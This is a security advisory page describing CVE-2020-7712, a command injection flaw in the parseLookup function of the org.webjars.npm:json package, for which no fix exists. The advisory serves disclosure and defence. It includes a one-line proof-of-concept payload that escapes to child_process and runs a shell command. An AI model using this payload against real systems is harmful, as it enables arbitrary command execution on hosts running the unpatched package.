Command Injection Affecting org.webjars.npm:json package, versions [0,]


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
1.52% (87th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Command Injection vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-JAVA-ORGWEBJARSNPM-608931
  • published30 Aug 2020
  • disclosed6 Aug 2020
  • creditpo6ix

Introduced: 6 Aug 2020

CVE-2020-7712  (opens in a new tab)
CWE-78  (opens in a new tab)

How to fix?

There is no fixed version for org.webjars.npm:json.

Overview

org.webjars.npm:json is an a 'json' command for massaging and processing JSON on the command line

Affected versions of this package are vulnerable to Command Injection. It is possible to inject arbritary commands using the parseLookup function.

PoC

const json = require('json');

res = json.parseLookup('{[this.constructor.constructor("return process")().mainModule.require("child_process").execSync("id").toString()]}'); console.log(res);

CVSS Scores

version 3.1